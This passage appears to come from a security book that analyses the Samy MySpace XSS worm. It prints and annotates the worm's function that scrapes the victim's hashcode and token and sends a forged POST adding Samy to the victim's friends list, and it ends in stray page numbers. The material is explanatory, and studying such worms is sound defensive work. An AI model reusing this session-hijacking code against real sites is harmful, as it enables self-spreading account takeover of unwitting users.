The main()function also performs another XMLHttpRequest to add Samy to the
victim??™s friend list. This request is performed by the following function:
// This function adds user "11851658" (a.k.a. Samy) to the victim's friends
// list.
function addSamyToVictimsFriendsList() {
// Standard XMLHttpRequest check to ensure that the HTTP request is
// complete.
if (xmlhttp2.readyState!=4) {
return;
}
var htmlBody = xmlhttp2.responseText;
var victimsHashcode = getHiddenParameter(htmlBody, 'hashcode');
var victimsToken = getParameterFromString(htmlBody, 'Mytoken');
var queryParameterArray = new Array();
queryParameterArray['hashcode'] = victimsHashcode;
// Samy's (old) ID on MySpace
queryParameterArray['friendID'] = '11851658';
queryParameterArray['submit'] = 'Add to Friends';
// the "invite.addFriendsProcess" action on myspace adds the friendID (in
// the POST body) to the victim's friends list
httpSend2('/index.cfm?fuseaction=invite.addFriendsProcess&Mytoken=' +
victimsToken, nothing, 'POST',
parameterArrayToParameterString(queryParameterArray));
}
Again, this function is similar to the previous functions. addSamyToVictimsFriend
sList() simply makes a request action to invite.
Pages:
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150